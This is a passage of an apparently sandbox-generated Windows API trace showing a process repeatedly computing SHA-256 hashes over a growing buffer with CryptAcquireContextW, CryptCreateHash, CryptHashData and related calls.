	[0239.563] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bfb80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bfb80, pdwDataLen=0x128ba4) returned 1
	[0239.563] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.563] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.563] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.563] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.563] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0239.564] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.564] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf518
	[0239.564] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf518, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf518, pdwDataLen=0x128ba4) returned 1
	[0239.564] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.564] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.564] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.564] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.564] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0239.564] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.564] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf540
	[0239.564] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bf540, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf540, pdwDataLen=0x128ba4) returned 1
	[0239.564] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.564] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.564] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.565] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.565] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0239.565] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf568
	[0239.565] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf568, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf568, pdwDataLen=0x128ba4) returned 1
	[0239.565] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.565] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.565] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.566] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.566] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0239.566] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf2e8
	[0239.566] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bf2e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf2e8, pdwDataLen=0x128ba4) returned 1
	[0239.566] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.566] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.566] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.566] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.566] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0239.567] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf310
	[0239.567] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf310, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf310, pdwDataLen=0x128ba4) returned 1
	[0239.567] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.567] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.567] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.567] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.567] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0239.567] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27beeb0
	[0239.567] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27beeb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27beeb0, pdwDataLen=0x128ba4) returned 1
	[0239.567] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.567] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.567] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.568] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.568] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0239.568] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.568] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf2c0
	[0239.568] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf2c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf2c0, pdwDataLen=0x128ba4) returned 1
	[0239.568] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.568] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.568] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.569] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.569] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0239.569] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.569] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf1f8
	[0239.569] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bf1f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf1f8, pdwDataLen=0x128ba4) returned 1
	[0239.569] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.569] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.569] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.569] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.570] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0239.570] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.570] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf248
	[0239.570] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf248, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf248, pdwDataLen=0x128ba4) returned 1
	[0239.570] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.570] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.570] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.571] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.571] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0239.571] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf428
	[0239.571] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bf428, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf428, pdwDataLen=0x128ba4) returned 1
	[0239.571] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.571] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.571] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.571] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.571] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0239.571] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf220
	[0239.571] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf220, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf220, pdwDataLen=0x128ba4) returned 1
	[0239.571] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.571] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.572] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.572] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.572] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0239.572] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf270
	[0239.572] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bf270, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf270, pdwDataLen=0x128ba4) returned 1
	[0239.572] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.572] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.572] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.573] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.573] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0239.573] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.573] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf298
	[0239.573] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf298, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf298, pdwDataLen=0x128ba4) returned 1
	[0239.573] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.573] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.573] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.574] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.574] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0239.574] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.574] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf338
	[0239.575] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bf338, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf338, pdwDataLen=0x128ba4) returned 1
	[0239.575] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.575] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.575] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.576] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.576] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0239.576] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.576] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf360
	[0239.576] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf360, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf360, pdwDataLen=0x128ba4) returned 1
	[0239.576] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.576] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.576] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.577] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.577] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0239.577] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf388
	[0239.577] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bf388, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf388, pdwDataLen=0x128ba4) returned 1
	[0239.577] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.578] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.578] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.578] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.578] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0239.579] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.579] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf3b0
	[0239.579] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf3b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf3b0, pdwDataLen=0x128ba4) returned 1
	[0239.579] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.579] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.579] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.580] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.580] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0239.580] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.580] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf3d8
	[0239.580] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bf3d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf3d8, pdwDataLen=0x128ba4) returned 1
	[0239.580] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.580] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.580] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.581] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.581] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0239.581] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.581] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf400
	[0239.581] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf400, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf400, pdwDataLen=0x128ba4) returned 1
	[0239.581] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.581] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.581] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.582] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.582] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0239.582] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.582] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bef50
	[0239.582] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bef50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bef50, pdwDataLen=0x128ba4) returned 1
	[0239.582] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.582] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.582] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.583] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.583] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0239.583] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.583] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bee88
	[0239.583] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bee88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bee88, pdwDataLen=0x128ba4) returned 1
	[0239.583] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.583] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.583] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.585] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.585] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0239.585] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.585] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27befc8
	[0239.585] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27befc8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27befc8, pdwDataLen=0x128ba4) returned 1
	[0239.585] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.585] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.585] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.591] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.591] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0239.591] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.591] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf108
	[0239.591] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf108, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf108, pdwDataLen=0x128ba4) returned 1
	[0239.591] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.591] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.591] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.591] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.591] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0239.591] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.591] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c03c8
	[0239.591] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c03c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c03c8, pdwDataLen=0x128ba4) returned 1
	[0239.591] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.591] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.591] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.592] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.592] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0239.592] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.592] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0350
	[0239.592] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0350, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0350, pdwDataLen=0x128ba4) returned 1
